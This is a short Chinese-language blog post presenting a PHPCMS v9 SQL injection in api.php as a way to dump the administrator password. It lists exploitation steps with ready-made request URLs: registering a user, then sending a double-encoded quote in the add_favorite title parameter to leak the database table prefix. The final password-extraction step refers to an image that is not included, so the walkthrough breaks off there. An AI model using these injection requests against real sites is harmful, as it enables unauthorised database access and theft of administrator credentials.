phpcmsv9最新爆管理密码漏洞
漏洞形成原因就不多说了 文件在phpcms/api.php 有兴趣的盆友可以多去挖一挖phpcms的洞子
主要利用过程:
第一步:注册一个用户
http://www.iick.blog/index.php?m=member&c=index&a=register&siteid=1
第二步:访问api文件,爆出表前缀,默认的表前缀为v9
http://www.iick.blog/api.php?op=add_favorite&url=hack1990.com&title=%2527
第三步:爆出用户密码(下面红色的字体就是要修改的表前缀)
如图:
上一篇:博文非书资料管理系统SQL注射

